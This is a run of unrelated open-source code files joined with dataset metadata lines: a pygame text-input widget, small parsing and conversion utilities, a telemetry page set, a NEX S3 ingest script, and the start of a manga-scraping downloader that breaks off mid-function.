self._setvalue(self.value[:self.pos-1] + self.value[self.pos:])
self.pos -= 1
elif e.key == K_DELETE:
if len(self.value) > self.pos:
self._setvalue(self.value[:self.pos] + self.value[self.pos+1:])
elif e.key == K_HOME:
self.pos = 0
elif e.key == K_END:
self.pos = len(self.value)
elif e.key == K_LEFT:
if self.pos > 0: self.pos -= 1
used = True
elif e.key == K_RIGHT:
if self.pos < len(self.value): self.pos += 1
used = True
elif e.key == K_RETURN:
self.next()
elif e.key == K_TAB:
pass
else:
#c = str(e.unicode)
try:
c = (e.unicode).encode('latin-1')
if c:
self._setvalue(self.value[:self.pos] + c + self.value[self.pos:])
self.pos += 1
except: #ignore weird characters
pass
self.repaint()
elif e.type == FOCUS:
self.repaint()
elif e.type == BLUR:
self.repaint()
self.pcls = ""
if self.container.myfocus is self: self.pcls = "focus"
return used
def __setattr__(self,k,v):
if k == 'value':
if v == None: v = ''
v = str(v)
self.pos = len(v)
_v = self.__dict__.get(k,NOATTR)
self.__dict__[k]=v
if k == 'value' and _v != NOATTR and _v != v:
self.send(CHANGE)
self.repaint()
class Password(Input):
"""A password input, text is *-ed out.
<pre>Password(value="",size=20)</pre>
<dl>
<dt>value<dd>initial text
<dt>size<dd>size for the text box, in characters
</dl>
<strong>Example</strong>
<code>
w = Password(value="password",size=20)
w = Password("53[r3+")
</code>
"""
def paint(self,s):
hidden="*"
show=len(self.value)*hidden
#print "self.value:",self.value
if self.pos == None: self.pos = len(self.value)
r = pygame.Rect(0,0,self.rect.w,self.rect.h)
cs = 2 #NOTE: should be in a style
w,h = self.font.size(show)
x = w-self.vpos
if x < 0: self.vpos -= -x
if x+cs > s.get_width(): self.vpos += x+cs-s.get_width()
s.blit(self.font.render(show, 1, self.style.color),(-self.vpos,0))
if self.container.myfocus is self:
#w,h = self.font.size(self.value[0:self.pos])
w,h = self.font.size(show[0:self.pos])
r.x = w-self.vpos
r.w = cs
r.h = h
s.fill(self.style.color,r)
| gpl-3.0 | -522,209,187,939,049,100 | 28.746988 | 89 | 0.473471 | false |
icomms/rapidsms | lib/rapidsms/parsers/__init__.py | 15 | 1377 | #!/usr/bin/env python
# vim: ai ts=4 sts=4 et sw=4
import re
from keyworder import *
class Matcher:
def __init__(self, msg, pattern_template="^%s$"):
self.tmpl = pattern_template
self.msg = msg
def __getitem__(self, n):
return self.groups[n]
def __call__(self, *patterns):
for pat in patterns:
# assume that one space means
# "any amount of whitespace"
pat = pat.replace(" ", "\s+")
# replace friendly tokens with real chunks
# of regex, to make the patterns more readable
for token, regex in Keyworder.TOKEN_MAP:
pat = pat.replace("(%s)" % token, regex)
# attempt to match the text of the message
# that this object was initialized with
# against the generated pattern
self.match_data = re.match(
self.tmpl % pat,
self.msg.text,
re.IGNORECASE)
# if we had a match, store the groups in
# this instance, and return true. if the
# end of the loop is reached without any
# match, None is returned implicitly
if self.match_data is not None:
self.groupdict = self.match_data.groupdict()
self.groups = self.match_data.groups()
return True
| lgpl-3.0 | 449,215,866,205,772,540 | 31.785714 | 60 | 0.54321 | false |
institution/mpskit | tdat.py | 1 | 1204 | """ Copyright 2015-2017 sta256+mpskit at gmail.com
This file is part of mpskit.
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU Affero General Public License as
published by the Free Software Foundation, either version 3 of the
License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY.
See LICENSE file for more details.
"""
from common import *
"""
Text DAT: one long null-terminated string, no compression, no madspack
"""
verbose = 0
def read_tdat(name):
check_ext(name, '.DAT')
r = open(name, 'rb').read()
if r.count(b'\x00') > 0:
fail("not tdat file, use rdat instead")
xs = r.split(b"\r\n")
msgs = [decode_string(x) for x in xs]
on = '{}.tdat.json'.format(name)
with open(on, 'w') as f:
json.dump(msgs, f, indent=2, ensure_ascii=False)
output(on)
def write_tdat(name):
check_ext(name, '.DAT')
on = '{}.tdat.json'.format(name)
with open(on, 'r') as f:
msgs = json.load(f)
r = b"\r\n".join([encode_string(s) for s in msgs])
with open(name, 'wb') as f:
f.write(r)
output(name)
| agpl-3.0 | 1,848,825,729,401,576,700 | 21.296296 | 72 | 0.651163 | false |
yury-s/v8-inspector | Source/chrome/tools/perf/page_sets/page_cycler/dhtml.py | 20 | 1829 | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from telemetry.page import page as page_module
from telemetry.page import page_set as page_set_module
class DhtmlPage(page_module.Page):
def __init__(self, url, page_set):
super(DhtmlPage, self).__init__(url=url, page_set=page_set)
class DhtmlPageSet(page_set_module.PageSet):
""" DHTML page_cycler benchmark """
def __init__(self):
super(DhtmlPageSet, self).__init__(
# pylint: disable=C0301
serving_dirs=set(['../../../../data/page_cycler/dhtml']),
bucket=page_set_module.PARTNER_BUCKET)
urls_list = [
'file://../../../../data/page_cycler/dhtml/colorfade/',
'file://../../../../data/page_cycler/dhtml/diagball/',
'file://../../../../data/page_cycler/dhtml/fadespacing/',
'file://../../../../data/page_cycler/dhtml/imageslide/',
'file://../../../../data/page_cycler/dhtml/layers1/',
'file://../../../../data/page_cycler/dhtml/layers2/',
'file://../../../../data/page_cycler/dhtml/layers4/',
'file://../../../../data/page_cycler/dhtml/layers5/',
'file://../../../../data/page_cycler/dhtml/layers6/',
'file://../../../../data/page_cycler/dhtml/meter/',
'file://../../../../data/page_cycler/dhtml/movingtext/',
'file://../../../../data/page_cycler/dhtml/mozilla/',
'file://../../../../data/page_cycler/dhtml/replaceimages/',
'file://../../../../data/page_cycler/dhtml/scrolling/',
'file://../../../../data/page_cycler/dhtml/slidein/',
'file://../../../../data/page_cycler/dhtml/slidingballs/',
'file://../../../../data/page_cycler/dhtml/zoom/'
]
for url in urls_list:
self.AddUserStory(DhtmlPage(url, self))
| bsd-3-clause | -250,426,505,711,858,140 | 39.644444 | 72 | 0.583379 | false |
azavea/nex2json-ingest | chunker/process_dataset.py | 2 | 3546 | #!/usr/bin/env python
"""
Code for extracting data about cities from NEX climate data.
Performs the following pipeline:
1. Read the file netCDF file from S3
2. Run nex2json on the dataset
3. Upload result to the appropriate bucket
"""
import argparse
import os
import re
import shutil
import tempfile
import logging
from boto.s3.connection import S3Connection
from boto.s3.key import Key
from nex2json import nex2json
from nex import BASE_TIMES
logger = logging.getLogger()
def generate_s3_path(rcp, var, model, year):
FORMAT = ('s3://nasanex/NEX-GDDP/BCSD/{rcp}/day/atmos/{var}/r1i1p1/'
'v1.0/{var}_day_BCSD_{rcp}_r1i1p1_{model}_{year}.nc')
return FORMAT.format(rcp=rcp, var=var, model=model, year=year)
def read_from_s3(s3path):
"""
Downloads a NetCDF file from s3
Returns a tuple with the s3 key name and the destination
"""
m = re.match('s3://([^/]+)/(.+)', s3path)
if m:
bucket_name = m.group(1)
key_name = m.group(2)
conn = S3Connection()
bucket = conn.get_bucket(bucket_name)
key = bucket.get_key(key_name)
(handle, file_path) = tempfile.mkstemp(suffix='.nc')
logger.info('Saving to {}'.format(file_path))
with os.fdopen(handle, 'wb') as tmp:
key.get_file(tmp)
return (key.name, file_path)
else:
logger.error('ERROR: cannot parse s3key %s', s3path)
return None
def upload_to_s3(data_dir, var, rcp, model, target_bucket):
"""
Uploads a directory to s3, prepending the rcp, var and model
to the s3 key as a path
"""
conn = S3Connection()
bucket = conn.get_bucket(target_bucket)
for filename in os.listdir(data_dir):
path = os.path.join(data_dir, filename)
key = Key(bucket)
key.key = '{}/{}/{}/{}'.format(rcp, var, model, filename)
logger.info('Uploading %s to %s', filename, key.key)
key.set_contents_from_filename(path)
def process_dataset(rcp, var, model, year, target_bucket):
"""
Download a NetCDF file from s3, extract and convert its contents to
json, and upload the json to a target bucket.
"""
s3path = generate_s3_path(rcp, var, model, year)
(s3key, path) = read_from_s3(s3path)
s3basename = os.path.splitext(os.path.basename(s3key))[0]
try:
tempdir = tempfile.mkdtemp()
logger.info('Tiling to %s', tempdir)
nex2json(path, tempdir, var, s3basename, model, BASE_TIMES[model])
try:
upload_to_s3(tempdir, var, rcp, model, target_bucket)
finally:
logger.info('Deleting directory %s', tempdir)
shutil.rmtree(tempdir)
finally:
logger.info('Deleting %s', path)
os.remove(path)
def main():
logger.addHandler(logging.StreamHandler())
logger.setLevel(logging.INFO)
parser = argparse.ArgumentParser()
parser.add_argument('rcp', metavar='RCP', type=str,
help='rcp45 or rcp85')
parser.add_argument('var', metavar='VAR', type=str,
help='pr, tasmax, or tasmin')
parser.add_argument('model', metavar='MODEL', type=str,
help='model name')
parser.add_argument('year', metavar='YEAR', type=int,
help='year')
parser.add_argument('target', metavar='TARGET', type=str,
help='target bucket')
args = parser.parse_args()
process_dataset(args.rcp, args.var, args.model, args.year, args.target)
if __name__ == '__main__':
main()
| apache-2.0 | 6,896,905,364,341,792,000 | 30.380531 | 75 | 0.617597 | false |
CZAlmon/MangaMine | MangaMine.py | 1 | 100653 | #Ver. 0.6.1
#Authors: Dylan Wise & Zach Almon
import urllib.request
import re
import os
import platform
import sys
import string
import html
import time
platformType = platform.system()
#site_number:
# Bato.to = 1
# Panda = 2
# Here = 3
def Search_Feature(site_number, file_directory):
set_of_letters = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm',
'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z',
'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M',
'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']
search_list_names = []
search_list_links = []
lines_from_file = []
with open((file_directory + "Manga_Database.txt"), "r") as f:
for line_in_text in f:
temp_string = line_in_text
lines_from_file.append(temp_string)
lines_from_file.pop(0) #Pop the warning off of the TextFile
lines_from_file.pop(0) #Pop the warning off of the TextFile
if site_number == 1:
lines_from_file.pop(0)
try:
my_int_number = int(lines_from_file[0])
except ValueError:
print('File Corrupt!')
exit()
lines_from_file.pop(0)
counter = 0
specific_sites_lines = []
for i in range(len(lines_from_file)):
temp_string = lines_from_file[i]
temp_string = temp_string[:-1] #Get rid of '\n' The Newline character
specific_sites_lines.append(temp_string)
counter += 1
if counter == my_int_number:
break
elif site_number == 2:
lines_from_file.pop(0)
try:
my_int_number = int(lines_from_file[0])
except ValueError:
print('File Corrupt!')
exit()
lines_from_file.pop(0)
counter = 0
for i in range(len(lines_from_file)):
lines_from_file.pop(0)
counter += 1
if counter == my_int_number:
break
lines_from_file.pop(0) #Extra Newline Pop
lines_from_file.pop(0) #Stars Pop
lines_from_file.pop(0) #Panda Name Pop
try:
my_int_number = int(lines_from_file[0])
except ValueError:
print('File Corrupt!')
exit()
lines_from_file.pop(0)
counter = 0
specific_sites_lines = []
for i in range(len(lines_from_file)):
temp_string = lines_from_file[i]
temp_string = temp_string[:-1] #Get rid of '\n' The Newline character
specific_sites_lines.append(temp_string)
counter += 1
if counter == my_int_number:
break
elif site_number == 3:
lines_from_file.pop(0)
try:
my_int_number = int(lines_from_file[0])
except ValueError:
print('File Corrupt!')
exit()
lines_from_file.pop(0)
counter = 0
for i in range(len(lines_from_file)):
lines_from_file.pop(0)
counter += 1
if counter == my_int_number:
break
lines_from_file.pop(0) #Extra Newline Pop
lines_from_file.pop(0) #Stars Pop
lines_from_file.pop(0) #Panda Name Pop
try:
my_int_number = int(lines_from_file[0])
except ValueError:
print('File Corrupt!')
exit()
lines_from_file.pop(0)
counter = 0
for i in range(len(lines_from_file)):
lines_from_file.pop(0)
counter += 1
if counter == my_int_number:
break
lines_from_file.pop(0) #Extra Newline Pop
lines_from_file.pop(0) #Stars Pop
lines_from_file.pop(0) #Here Name Pop
try:
my_int_number = int(lines_from_file[0])
except ValueError:
print('File Corrupt!')
exit()
lines_from_file.pop(0)
counter = 0
specific_sites_lines = []
for i in range(len(lines_from_file)):
temp_string = lines_from_file[i]
temp_string = temp_string[:-1] #Get rid of '\n' The Newline character
specific_sites_lines.append(temp_string)
counter += 1
if counter == my_int_number:
break
else:
print('Invalid Site Number! Program Terminated')
exit()
lines_from_list = []
for i in range(len(specific_sites_lines)):
lines_from_list = specific_sites_lines[i].split("\t")
search_list_names.append(lines_from_list[0])
search_list_links.append(lines_from_list[1])
#Actual Input Decision Making After Here:
search_list_letters = []
search_list_letter_links = []
search_found_bool = False #Search is/isnt found
search_quit_bool = False
search_int = 0 #Search is/isnt found
while True:
print('You have 2 options to choose the manga you want to download.')
print('Do you want to provide a direct [l]ink or [s]earch for a manga?')
print('\tOr do you want to [q]uit the program?\n')
urlRequest = input('')
print()
if urlRequest == 'q':
exit()
elif urlRequest == 'l':
print('Please enter the url of the manga you wish to download (or q to quit): ')
print('The Link needs to be the top page of the manga you wish to download like:')
print('Ex. 1:\thttp://bato.to/comic/_/comics/seto-no-hanayome-r385')
print('Ex. 2:\thttp://www.mangapanda.com/372/seto-no-hanayome.html')
print('Ex. 3:\thttp://www.mangahere.co/manga/seto_no_hanayome/')
urlRequest = input('')
print('\n')
if urlRequest == 'q':
exit()
else:
return urlRequest
elif urlRequest == 's':
print('To Search for a Manga Title, Please input a Letter')
print('A - Z to choose a manga starting with that letter')
print('\'Misc\' for manga not starting with a letter')
print('or \'Quit\' to quit the search\n')
search_input = input('')
print()
#We need everything in the string to be lower case.
search_input = search_input.lower()
#Set of letters is a hard coded list
if search_input in set_of_letters or search_input == 'misc':
if search_input in set_of_letters:
#Get the list of mangas in the specific letter
for i in range(len(search_list_names)):
if search_list_names[i][0] == search_input.lower() or search_list_names[i][0] == search_input.upper():
search_list_letters.append(search_list_names[i])
search_list_letter_links.append(search_list_links[i])
elif search_input == 'misc':
print('Warning!! Some of these manga have special characters.')
print('These manga will display like: ')
print('"0\\xc3\\x970 Memories" instead of 0 (Special Characters) 0 Memories')
print('These special (unicode) Characters can\'t be displayed here. Sorry.')
print('You will still be able to search for the manga you want, just don\'t')
print('overlook anything with something like: \\xc95\\x73 \n\n')
time.sleep(10)
#Get the list of mangas that are misc
for i in range(len(search_list_names)):
if search_list_names[i][0] not in set_of_letters:
search_list_letters.append(search_list_names[i])
search_list_letter_links.append(search_list_links[i])
else:
print('Fatal Error with search input!')
exit()
print('Here is a list of the first 50 Manga Names.')
print('Keep in mind you cannot go back')
print('\tYour options are:')
print('The number of the manga you want')
print('\'n\' for the next 50 names')
print('\'q\' to quit to the main menu\n')
for i in range(len(search_list_letters)):
#Plus one here So there will be a minus one later!!!
print('Number ' + str(i+1) + ' ' + search_list_letters[i])
if i % 50 == 49 or (i == (len(search_list_letters) - 1)):
print('\nYour options are:')
print('The number of the manga you want')
print('\'n\' for the next 50 names')
print('\'q\' to quit to the main menu\n')
while True:
print('Choose:')
search_input = input('')
print('\n')
if search_input.isdigit():
if int(search_input) > 0 and int(search_input) < len(search_list_letters):
print('Your choice is: ' + search_list_letters[int(search_input)-1], end = '\n\n')
search_int = (int(search_input) - 1) #Subtract one for the option before
search_found_bool = True
break
else:
print('Your choice needs to be greater then 0 and less then ' + str(len(search_list_letters)))
elif search_input == 'n':
print('\nThe next 50 manga:\n')
break
elif search_input == 'q':
search_quit_bool = True
break
elif search_input == 'l':
print('\nYour options are:')
print('The number of the manga you want')
print('\'n\' for the next 50 names')
print('\'q\' to quit to the main menu\n')
else:
print('Invalid choice!')
print()
if search_found_bool:
break
if search_quit_bool:
break
if search_found_bool:
#At this point the index has been found for the manga name and link
# In the search list letters list!!!
break
else:
#Reset Settings
search_list_letters = []
search_list_letter_links = []
search_found_bool = False
search_quit_bool = False
search_int = 0
print('For some reason your search didn\'t work.')
print('You will now have to try again, sorry!')
#If found succesful break here
elif search_input == 'quit':
#Dont break just loop back to the main choices again
pass
else:
print()
print('Invalid option!')
else:
print('Invalid option!')
link_to_return = search_list_letter_links[search_int]
return link_to_return
def Batoto():
success = False
Search_feature = False
currentDirectory = os.getcwd()
if platformType == 'Windows':
Search_feature_directory = currentDirectory + '\\Manga_Names_And_Links\\'
else:
Search_feature_directory = currentDirectory + '/Manga_Names_And_Links/'
Search_feature = os.path.isfile(Search_feature_directory + 'Manga_Database.txt')
currentDirectory = os.getcwd()
if platformType == 'Windows':
MASTERdirectoryName = currentDirectory + "\\Batoto"
else:
MASTERdirectoryName = currentDirectory + "/Batoto"
try:
os.makedirs(MASTERdirectoryName)
except OSError:
if not os.path.isdir(MASTERdirectoryName):
raise
#MASTERdirectoryName is the Variable that will keep the program downloading
#Different Manga to the same Batoto Folder
os.chdir(MASTERdirectoryName)
while success == False:
downloadManga = False
if Search_feature:
while True:
search_url = Search_Feature(1, Search_feature_directory)
try:
urllibHTML = urllib.request.urlopen(search_url).read()
downloadManga = True
break
except:
print()
print('Invalid URL!')
print('Please Try Again')
else:
print('The URL you are to input below should be the top level page of the')
print('manga you wish to download')
print('Ex: http://bato.to/comic/_/comics/seto-no-hanayome-r385 ')
print()
while True:
print('Please enter the url of the manga you wish to download (or q to quit): ')
urlRequest = input('')
print('\n')
if urlRequest == 'q':
return
try:
urllibHTML = urllib.request.urlopen(urlRequest).read()
downloadManga = True
break
except:
print()
print('Invalid URL!')
type_one_manga = False
type_two_manga = False
if downloadManga == True:
Manga_Title = re.findall(r'<title>+(.*?)- Scanlations', str(urllibHTML))
if len(Manga_Title) == 0:
print("Title not found. URL or HTML Error.")
break
Manga_Title_string = Manga_Title[0]
Manga_Title_string = Manga_Title_string[:-1]
Manga_Title_string = re.sub(r'\\x\w{2}', r' ', Manga_Title_string)
#Python 3.4 Converts '&' Type things to their string equivelant.
Manga_Title_string = html.unescape(Manga_Title_string)
#Get rid of Non-Functioning characters for Filenames
directorySafeName = Manga_Title_string
directorySafeName = directorySafeName.replace("/", " over ")
directorySafeName = directorySafeName.replace(":", "")
directorySafeName = directorySafeName.replace("?", "")
directorySafeName = directorySafeName.replace("+", " plus ")
directorySafeName = directorySafeName.replace("\"","'")
directorySafeName = directorySafeName.replace("%", " Percent ")
directorySafeName = directorySafeName.replace("<", "")
directorySafeName = directorySafeName.replace(">", "")
Manga_Title_string = directorySafeName
#For any other language on Bato.to change lang_English to whatever matches the language you desire.
#Then this file *SHOULD* work with your language. It is Untested as anything else but english
allENGLISHChaps = re.findall(r'lang_English+(.*?)\ title="+', str(urllibHTML))
if len(allENGLISHChaps) == 0:
print("Manga has no English Chapters or there was an error reading the HTML!")
else:
First_chapter_string = allENGLISHChaps[-1]
First_chapter_address = re.findall(r'href=\"+(.*?)\"', First_chapter_string)
First_chapter_address_string = First_chapter_address[0]
try:
First_chapter_html = urllib.request.urlopen(First_chapter_address_string).read()
except:
print()
print('Trouble Opening Webpage!')
downloadManga = False
if downloadManga == True:
#Find which type of manga this manga is. Whether all pages of the chapter are on one page or multiple pages.
type_one_padding_right = re.search("<div style=\"text-align:center;\">", str(First_chapter_html))
type_two_comic_page = re.search("comic_page", str(First_chapter_html))
#Type one is All images on One Page
if type_one_padding_right != None:
type_one_manga = True
#Type two is All images on seperate pages
elif type_two_comic_page != None:
type_two_manga = True
else:
print("There was an error with the Manga Type!")
return
#This will get the chapter links from the Select options on the chapters first page
#There are 2 select options (one at top and one at bottom
#They are same so its arbutrary which you pick. I Will be selecting [0]
get_Chapters = re.findall(r'250px;">+(.*?)</select>', str(First_chapter_html))
chapter_master_string = get_Chapters[0]
list_of_Chapter_Links = []
#Get all chapter links. Last thing in list is an unneeded "selected" string. Pop that off.
list_of_Chapter_Links = re.findall(r'\"+(.*?)\"', chapter_master_string)
#In this list there may be a "selected". It may or may not be at the end. The loop solves it.
#I am 95% sure there will only ever be 1 "selected" per list.
#list_of_Chapter_Links.pop(-1)
for i in range(len(list_of_Chapter_Links)):
if list_of_Chapter_Links[i] == "selected":
list_of_Chapter_Links.pop(i)
break
#Get Numbers of the chapters. Will be "Matched" up to the list_of_Chapter_Links.
list_of_Chapter_Numbers_raw = re.findall(r'Ch\.+(.*?)<', chapter_master_string)
list_of_chapter_names_refined = []
#Some chapters may be like "230: Title of Chapter" Some may be "145"
for i in range(len(list_of_Chapter_Numbers_raw)):
temp_list = re.findall('^(.*?):', list_of_Chapter_Numbers_raw[i])
if len(temp_list) == 0:
list_of_chapter_names_refined.append(list_of_Chapter_Numbers_raw[i])
elif len(temp_list) == 1:
list_of_chapter_names_refined.append(temp_list[0])
else:
print("Manga Chapter Name Error!")
return
# list_of_Chapter_Links Has Links -Has Duplicates at this point
# list_of_chapter_names_refined Has Names -Has Duplicates at this point
#
# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
# This Comment Block is what remains of a method to delete repeated chapters
# Due to some Manga Chapter names and Chapter Quality it has (as of 7/2/15) become
# very difficult to keep duplicate chapters out without some problems arising.
# This Code shall be kept here so in the future if a more effective way to
# delete duplicates while keeping original's/good quality chapters becomes apparent
# we can reimplement this feature.
#
#list_of_Chapter_Links_Final = []
#list_of_Chapter_Numbers_Final = []
#for i in range(len(list_of_chapter_names_refined)):
# if list_of_chapter_names_refined[i] in list_of_Chapter_Numbers_Final:
# pass
# else:
# list_of_Chapter_Numbers_Final.append(list_of_chapter_names_refined[i])
# list_of_Chapter_Links_Final.append(list_of_Chapter_Links[i])
list_of_Chapter_Links_Final = list_of_Chapter_Links
list_of_Chapter_Numbers_Final = list_of_chapter_names_refined
list_of_Chapter_Links_Final.reverse()
list_of_Chapter_Numbers_Final.reverse()
can_be_sorted = True
#Checks to see if the manga chapters can be sorted by number (basically are all the chapters floats)
#If not only full downloads are available for that manga due to some manga chapters being
# wildly out of order AND not being an integers/floats, a feature to download only some chapters
# has proven very difficult.
for i in range(len(list_of_Chapter_Numbers_Final)):
try:
float(list_of_Chapter_Numbers_Final[i])
except ValueError:
print('Sorry, this manga can\'t be sorted.')
print('You can only do a full download.')
print('\n')
can_be_sorted = False
break
fullDownload = False
chapter_found = False
custom_start = False
custom_end = False
chapter_to_start_from = ''
place_to_start_from_index = 0
chapter_to_end_at = ''
place_to_end_at_index = 0
if can_be_sorted:
#Selection Sort. Efficiency isn't needed here, all manga on bato.to should be below 1500 chapters.
#What's needed is to keep 'list_of_Chapter_Numbers_Final' and 'list_of_Chapter_Links_Final' together/one-to-one.
#Meaning the chapter at list_of_Chapter_Numbers_Final[i] has the link at list_of_Chapter_Links_Final[i]
for i in range(len(list_of_Chapter_Numbers_Final)):
current = i
for k in range(i+1, len(list_of_Chapter_Numbers_Final)):
if float(list_of_Chapter_Numbers_Final[k]) < float(list_of_Chapter_Numbers_Final[current]):
current = k
list_of_Chapter_Numbers_Final[i], list_of_Chapter_Numbers_Final[current] = list_of_Chapter_Numbers_Final[current], list_of_Chapter_Numbers_Final[i]
list_of_Chapter_Links_Final[i], list_of_Chapter_Links_Final[current] = list_of_Chapter_Links_Final[current], list_of_Chapter_Links_Final[i]
while 1:
print('Do you wish to download the entire manga? [y/n], [l] to list out the chapters, or [q] to quit.')
continueChoiceFullDownload = input('')
print('\n')
if continueChoiceFullDownload == 'l':
for k in range(len(list_of_Chapter_Numbers_Final)):
print(repr(list_of_Chapter_Numbers_Final[k]).ljust(20), end='')
if (k % 3) == 2:
print('\n', end='')
print('', end='\n')
print('', end='\n')
elif continueChoiceFullDownload == 'y':
fullDownload = True
break
elif continueChoiceFullDownload == 'n':
while 1:
print('Do you wish to start download from a certain chapter? [y/n], [l] to list out the chapters, or [q] to quit.')
print('By Choosing no the entire manga will download')
continueChoiceCustomChap = input('')
print('\n')
if continueChoiceCustomChap == 'l':
for k in range(len(list_of_Chapter_Numbers_Final)):
print(repr(list_of_Chapter_Numbers_Final[k]).ljust(20), end='')
if (k % 3) == 2:
print('\n', end='')
print('', end='\n')
print('', end='\n')
elif continueChoiceCustomChap == 'y':
print('Please enter the chapter you wish to start from')
chapNum = input('')
print('\n')
for i in range(len(list_of_Chapter_Numbers_Final)):
if chapNum == list_of_Chapter_Numbers_Final[i]:
chapter_found = True
custom_start = True
chapter_to_start_from = list_of_Chapter_Numbers_Final[i]
place_to_start_from_index = i
break
if chapter_found == False:
print('Invalid chapter number! Maybe the chapter is missing?')
print()
else:
print('Chapter Found!')
print('\n')
#May use chapter_found again for the end point
chapter_found = False
break
elif continueChoiceCustomChap == 'n':
fullDownload = True
break
elif continueChoiceCustomChap == 'q':
return
else:
print('Invalid Option!')
print()
if fullDownload == False:
while 1:
print('Do you wish to end the download at a certain chapter?[y/n], [l] to list out the chapters, or [q] to quit.')
print('By Choosing no the entire manga will download from the start location')
continueChoiceCustomChap = input('')
print('\n')
if continueChoiceCustomChap == 'l':
for k in range(len(list_of_Chapter_Numbers_Final)):
print(repr(list_of_Chapter_Numbers_Final[k]).ljust(20), end='')
if (k % 3) == 2:
print('\n', end='')
print('', end='\n')
print('', end='\n')
elif continueChoiceCustomChap == 'y':
print('Please enter the chapter you wish to end at')
chapNum = input('')
print('\n')
temp_bool = True
for i in range(len(list_of_Chapter_Numbers_Final)):
if chapNum == list_of_Chapter_Numbers_Final[i]:
#not working
if i < place_to_start_from_index:
print('Sorry, Number must be greater than or equal to the Start chapter, which is:', chapter_to_start_from)
print('Invalid Option!')
print()
temp_bool = False
break
else:
chapter_found = True
custom_end = True
temp_bool = True
chapter_to_end_at = list_of_Chapter_Numbers_Final[i]
place_to_end_at_index = i
#This loop is to make sure all duplicates are included
#in the chapter list
for k in range(place_to_end_at_index, len(list_of_Chapter_Numbers_Final)):
if chapNum == list_of_Chapter_Numbers_Final[k]:
place_to_end_at_index = k
break
if temp_bool == True:
if chapter_found == False:
print('Invalid chapter number! Maybe the chapter is missing?')
print()
else:
print('Chapter Found!')
print('\n')
break
elif continueChoiceCustomChap == 'n':
break
elif continueChoiceCustomChap == 'q':
return
else:
print('Invalid Option!')
print()
#At the end of the Main elif choice == no
break
elif continueChoiceFullDownload == 'q':
return
else:
print('Invalid Option!')
else:
fullDownload = True
print('Do you want to quit the program before downloading')
print('the entire manga? [y/n]')
while True:
quit_or_not = input()
quit_or_not = quit_or_not.lower()
if quit_or_not == 'y':
return
elif quit_or_not == 'n':
break
else:
print('Invalid input! Do you want to quit? [y/n]')
#For Reference:
#If fullDownload = True
#The user wants to download From chapter 1 to the end (Whatever is available)
#If custom_start = True Than fullDownload == False
#The user wants to download from The start chapter which was Found and stored in chapter_to_start_from
#Does not Need custom_end to be True. If it isnt then it will download until the end of manga
#If custom_end = True Than custom_start == True AND fullDownload == False
#The user wants to download from The start chapter which was Found and stored in chapter_to_start_from
#The user also wants to download until an end chapter which was Found and stored in chapter_to_end_at
#This if, elif, and elif are to set which chapters are to be downloaded.
if fullDownload == True:
pass
#If you only have a start location, pop off chapter numbers/links until you hit that chapter
elif custom_start == True and custom_end == False:
for i in range(place_to_start_from_index):
list_of_Chapter_Links_Final.pop(0)
list_of_Chapter_Numbers_Final.pop(0)
#Do same As before But will need to pop off end as well
#I found it easier to reverse then do down the list in decending order
#And pop off from begining until the end chapter is reached.
#Then reverse again.
elif custom_start == True and custom_end == True:
for i in range(place_to_start_from_index):
list_of_Chapter_Links_Final.pop(0)
list_of_Chapter_Numbers_Final.pop(0)
for i in range(len(list_of_Chapter_Links_Final)-(int(place_to_end_at_index)-int(place_to_start_from_index))-1):
list_of_Chapter_Links_Final.pop(-1)
list_of_Chapter_Numbers_Final.pop(-1)
else:
print('Fatal error with the start selection')
return
#Because there are duplicates I must check and add a v2 or v3 if it is in there more times
temp_name = []
temp_name_str = ''
for i in range(len(list_of_Chapter_Numbers_Final)):
if list_of_Chapter_Numbers_Final[i] in temp_name:
#At this point there are duplicates. The chapters may not be in order.
#This is the only method I can come up with to deal with duplicates
# that may be out of order.
temp_name_str = list_of_Chapter_Numbers_Final[i] + ' v2'
if temp_name_str in temp_name:
temp_name_str = list_of_Chapter_Numbers_Final[i] + ' v3'
if temp_name_str in temp_name:
temp_name_str = list_of_Chapter_Numbers_Final[i] + ' v4'
if temp_name_str in temp_name:
temp_name_str = list_of_Chapter_Numbers_Final[i] + ' v5'
if temp_name_str in temp_name:
temp_name_str = list_of_Chapter_Numbers_Final[i] + ' v6'
if temp_name_str in temp_name:
temp_name_str = list_of_Chapter_Numbers_Final[i] + ' v7'
if temp_name_str in temp_name:
temp_name_str = list_of_Chapter_Numbers_Final[i] + ' v8'
if temp_name_str in temp_name:
temp_name_str = list_of_Chapter_Numbers_Final[i] + ' v9'
if temp_name_str in temp_name:
temp_name_str = list_of_Chapter_Numbers_Final[i] + ' v10'
#If there are more then 10 dulicates I can't help you
temp_name.append(temp_name_str)
else:
temp_name.append(list_of_Chapter_Numbers_Final[i])
list_of_Chapter_Numbers_Final = temp_name
currentDirectory = MASTERdirectoryName
if platformType == 'Windows':
manga_directory_name = currentDirectory + "\\" + Manga_Title_string
else:
manga_directory_name = currentDirectory + "/" + Manga_Title_string
try:
os.makedirs(manga_directory_name)
except OSError:
if not os.path.isdir(manga_directory_name):
raise
os.chdir(manga_directory_name)
#Main Loop for Downloading Images.
if fullDownload == True or custom_start == True:
for i in range(len(list_of_Chapter_Numbers_Final)):
first_page_of_each_chapter = True
chapter_number = list_of_Chapter_Numbers_Final[i]
chapter_link = list_of_Chapter_Links_Final[i]
if platformType == 'Windows':
chapDirectoryName = manga_directory_name + "\\Chapter " + chapter_number
else:
chapDirectoryName = manga_directory_name + "/Chapter " + chapter_number
try:
os.makedirs(chapDirectoryName)
except OSError:
if not os.path.isdir(chapDirectoryName):
raise
os.chdir(chapDirectoryName)
print("Downloading Chapter", chapter_number)
urllibHTML = urllib.request.urlopen(list_of_Chapter_Links_Final[i]).read()
if type_one_manga == True:
get_images = re.findall(r'text-align:center;">+(.*?)</div><div', str(urllibHTML))
get_images_master_string = get_images[0]
image_file_name_list = re.findall(r"<img src=\\'(.*?)\\'", str(get_images_master_string))
Amount_of_pages = len(image_file_name_list)
for j in range(len(image_file_name_list)):
